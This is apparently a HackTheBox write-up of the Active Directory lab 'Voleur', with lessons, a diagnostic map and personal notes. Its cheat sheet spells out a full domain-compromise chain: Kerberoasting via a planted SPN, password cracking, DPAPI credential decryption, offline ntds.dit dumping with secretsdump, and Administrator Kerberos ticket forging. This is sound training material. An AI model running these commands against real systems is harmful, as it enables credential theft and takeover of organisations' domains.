Kerberos setup matters. /etc/hosts, /etc/krb5.conf, DC FQDN usage, and clock sync were all required.

Always check klist. Many failures came from the wrong .ccache being active.

NetExec and bloodyAD use different Kerberos cache syntax. NetExec uses --use-kcache; bloodyAD uses -k ccache=<file>.

SMB shares can be the main exploit path. The readable IT share provided the spreadsheet that started the credential chain.

Encrypted Office files are not dead ends. office2john and John recovered the document password.

WriteSPN is a powerful targeted Kerberoasting primitive. It allowed roasting svc_winrm without needing broad SPN enumeration.

Clean up planted SPNs. After Kerberoasting, remove the temporary SPN from the target account.

WinRM should be Kerberos-based on this box. evil-winrm -r VOLEUR.HTB was the reliable pattern.

Deleted AD objects can be part of the intended path. Restore_Users membership allowed the deleted Todd account to be restored.

PSCredential creation does not validate credentials. The first AD cmdlet using -Credential is the real test.

If Evil-WinRM breaks on AD cmdlets, use a run-as helper and execute a separate PowerShell process as the privileged account.

DPAPI recovery requires multiple pieces: credential blob, masterkey, user SID, and user password.

Roaming credential blobs pair naturally with Roaming Protect\<SID> masterkeys.

WSL root is not Windows Administrator, but it may expose mounted Windows backup data.

Offline ntds.dit extraction is a full domain compromise path.

When NTLM is disabled, use recovered hashes to request Kerberos TGTs instead of trying pass-the-hash WinRM.


⚡ Commands Cheat Sheet

Kerberos Setup

echo "[TARGET_IP] dc.voleur.htb voleur.htb dc" | sudo tee -a /etc/hosts
sudo ntpdate [TARGET_IP]

Minimal /etc/krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
 
[realms]
    VOLEUR.HTB = {
        kdc = dc.voleur.htb
        admin_server = dc.voleur.htb
        default_domain = voleur.htb
    }
 
[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Request and export TGT:

impacket-getTGT voleur.htb/[USER]:'[PASSWORD]' -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

Hash-based TGT:

impacket-getTGT voleur.htb/[USER] -hashes :[NT_HASH] -dc-ip [TARGET_IP]
export KRB5CCNAME="$(realpath [USER].ccache)"
klist

SMB Enumeration and Download

nxc smb dc.voleur.htb --use-kcache --shares
nxc smb dc.voleur.htb --use-kcache --spider IT --regex .
nxc smb dc.voleur.htb --use-kcache --spider IT --content --pattern "passw"

Download file:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Folder\\Sub Folder\\file.ext' file.ext

Office Cracking

file Access_Review.xlsx
office2john Access_Review.xlsx > office_hash.txt
john office_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john office_hash.txt --show

RustHound-CE

rusthound-ce \
  --domain voleur.htb \
  -u '[USER]' \
  -p '[PASSWORD]' \
  -z

bloodyAD Kerberos Cache

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u [USER] \
  -k ccache="$(realpath [USER].ccache)" \
  get object [OBJECT] --attr distinguishedName

WriteSPN / Targeted Kerberoast

Add fake SPN:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  set object svc_winrm servicePrincipalName -v 'http/malicious'

Request TGS:

GetUserSPNs.py \
  -k \
  -no-pass \
  -dc-host dc.voleur.htb \
  voleur.htb/svc_ldap \
  -request

Crack:

hashcat -m 13100 svc_winrm.hash /usr/share/wordlists/rockyou.txt
hashcat -m 13100 svc_winrm.hash --show

Remove fake SPN:

bloodyAD -H dc.voleur.htb \
  -d voleur.htb \
  -u svc_ldap \
  -k ccache="$(realpath svc_ldap.ccache)" \
  msldap delspn 'CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb' 'http/malicious'

Evil-WinRM with Kerberos

export KRB5CCNAME="$(realpath [USER].ccache)"
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

RunasCs AD Restore Workflow

Upload:

mkdir C:\Temp
cd C:\Temp
upload RunasCs.exe

Test:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "cmd /c whoami"

Create deleted-object enum script:

Set-Content C:\Temp\enum_deleted.ps1 @'
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects -Properties distinguishedName,objectSid,sAMAccountName -SearchBase 'CN=Deleted Objects,DC=voleur,DC=htb' | Format-List Name,ObjectClass,DistinguishedName,ObjectSid
'@

Run as svc_ldap:

.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\enum_deleted.ps1"

Restore Todd:

Set-Content C:\Temp\restore_todd.ps1 @'
Import-Module ActiveDirectory
Restore-ADObject -Identity 'CN=Todd Wolfe\0ADEL:[GUID],CN=Deleted Objects,DC=voleur,DC=htb'
'@
 
.\RunasCs.exe svc_ldap '[SVC_LDAP_PASSWORD]' "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Temp\restore_todd.ps1"

DPAPI

Download artifacts:

nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/[BLOB]' [BLOB]
 
nxc smb dc.voleur.htb \
  --use-kcache \
  --share IT \
  --get-file 'Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/[TODD_SID]/[MASTERKEY]' [MASTERKEY]

Decrypt masterkey:

impacket-dpapi masterkey \
  -file [MASTERKEY] \
  -sid [TODD_SID] \
  -password '[TODD_PASSWORD]'

Decrypt credential:

impacket-dpapi credential \
  -file [BLOB] \
  -key 0x[DECRYPTED_MASTERKEY]

SSH / WSL Pivot

chmod 600 id_rsa
ssh -i id_rsa svc_backup@dc.voleur.htb -p 2222

Check sudo and backups:

whoami
sudo -l
ls -la /mnt/c/IT/'Third-Line Support'/Backups
find /mnt/c/IT/'Third-Line Support'/Backups -maxdepth 3 -type f -ls

Copy backup files from Kali:

scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/Active Directory/ntds.dit" ./ntds.dit
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SYSTEM" ./SYSTEM
 
scp -i id_rsa -P 2222 "svc_backup@dc.voleur.htb:/mnt/c/IT/Third-Line Support/Backups/registry/SECURITY" ./SECURITY

Offline NTDS Dump

impacket-secretsdump \
  -ntds ntds.dit \
  -system SYSTEM \
  -security SECURITY \
  LOCAL

Administrator TGT:

impacket-getTGT voleur.htb/administrator \
  -hashes :[ADMIN_NT_HASH] \
  -dc-ip [TARGET_IP]
 
export KRB5CCNAME="$(realpath administrator.ccache)"
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Field-manual techniques demonstrated on this box:


🧭 Diagnostic Map

Symptom: STATUS_NOT_SUPPORTED during SMB/LDAP auth
Meaning: NTLM is disabled
Next:    Use Kerberos, TGTs, and --use-kcache

Symptom: Tool tries HTB:88
Meaning: Domain/realm inference is wrong
Next:    Fix /etc/krb5.conf, target dc.voleur.htb, and explicitly use voleur.htb

Symptom: Kerberos errors after config looks correct
Meaning: Clock skew or wrong cache
Next:    sudo ntpdate [DC_IP], then klist

Symptom: smbclient returns Could not find a suitable mechtype
Meaning: Local Samba Kerberos/SPNEGO issue
Next:    Use Impacket or NetExec with --use-kcache

Symptom: NetExec --get-file returns path not found
Meaning: Remote path includes the share name twice or path escaping is wrong
Next:    With --share IT, use a path relative to IT

Symptom: Office file shows CDFV2 Encrypted
Meaning: Password-protected Office document
Next:    office2john, then John/Hashcat

Symptom: GetUserSPNs.py says NTLM negotiation failed
Meaning: You used password/NTLM bind
Next:    Use -k -no-pass with the current Kerberos cache

Symptom: bloodyAD rejects --use-kcache
Meaning: That is a NetExec flag
Next:    Use -k ccache=<file> with bloodyAD

Symptom: SPN cleanup fails with remove object
Meaning: Wrong bloodyAD command family
Next:    Use msldap delspn

Symptom: Evil-WinRM crashes or errors with -u/-p
Meaning: NTLM/password mode is unreliable here
Next:    Use Kerberos mode: evil-winrm -i dc.voleur.htb -r VOLEUR.HTB

Symptom: $Cred command fails in zsh
Meaning: You are back on Kali, not inside PowerShell
Next:    Reconnect to Evil-WinRM first

Symptom: Get-ADUser -Credential $Cred crashes Evil-WinRM
Meaning: Local Evil-WinRM client instability
Next:    Use RunasCs to spawn PowerShell as the target account

Symptom: RunasCs.exe not recognized
Meaning: PowerShell does not execute current-directory binaries by default
Next:    Use .\RunasCs.exe

Symptom: Restore-ADObject returns no output
Meaning: Could be normal
Next:    Verify by re-enumerating deleted objects

Symptom: BloodHound says Todd is not in database
Meaning: BloodHound data was collected before Todd was restored
Next:    Ignore or recollect later

Symptom: DPAPI credential blob decrypt fails
Meaning: Wrong masterkey or wrong blob
Next:    Try the matching Roaming blob/masterkey first, then Local blob

Symptom: scp tries resolving target to 127.0.1.1
Meaning: You ran scp from inside the WSL SSH session
Next:    Exit and run scp from Kali

Symptom: SSH private key has bad permissions
Meaning: Key is too open
Next:    chmod 600 id_rsa

Symptom: evil-winrm -H fails as Administrator
Meaning: NTLM is disabled
Next:    Use the NT hash to request a Kerberos TGT


📝 Personal Notes

Voleur was an excellent CPTS-style machine because it forced a Kerberos-first workflow from the beginning.

The first major lesson was not to misread STATUS_NOT_SUPPORTED as bad credentials. The server explicitly showed NTLM:False, so the right response was to fix Kerberos rather than keep trying NTLM relay, Responder, or password-mode authentication.

The second lesson was that small environment issues matter. /etc/hosts, /etc/krb5.conf, realm casing, FQDN targeting, and time sync were all required before the rest of the machine became smooth.

The SMB share was the real starting point. The readable IT share contained the encrypted spreadsheet, and the spreadsheet gave the first meaningful credential expansion. This reinforced that SMB file review can be more valuable than exploit hunting.

The spreadsheet was also a good reminder that protected Office documents are not dead ends. The document password was crackable, and once opened, the notes gave direct hints toward service accounts, Todd’s deleted state, and the later restore path.

The svc_ldap stage was a clean AD ACL abuse example. BloodHound showed WriteSPN over svc_winrm, and that translated directly into targeted Kerberoasting. The important operational detail was doing everything with Kerberos because NTLM was disabled.

Restoring Todd was initially confusing because using -Credential inside AD cmdlets caused Evil-WinRM instability. Using RunasCs to spawn a full PowerShell process as svc_ldap was more reliable and mapped better to the privilege model.

The DPAPI section was one of the most useful learning points. The spider output looked noisy at first, but the meaningful files were predictable: Credentials blobs and Protect\<SID> masterkeys. Once the relationship clicked, decrypting Jeremy’s saved credential was straightforward.

The WSL pivot was another strong methodology lesson. Root inside WSL was not the same as Windows Administrator, but it gave access to mounted Windows backup material. That was enough to reach ntds.dit, SYSTEM, and SECURITY.

The final step reinforced the Kerberos-only theme. Even with the Administrator NT hash, the correct move was not evil-winrm -H; it was requesting an Administrator TGT and then using Evil-WinRM with Kerberos realm mode.

Overall, Voleur reinforced a strong AD methodology:

Recognize authentication constraints early.
Use Kerberos correctly.
Enumerate SMB shares deeply.
Treat Office documents and notes as credential sources.
Translate BloodHound edges into exact abuse primitives.
Use DPAPI methodically.
Understand Windows/WSL boundary behavior.
Use offline AD backups for domain compromise when available.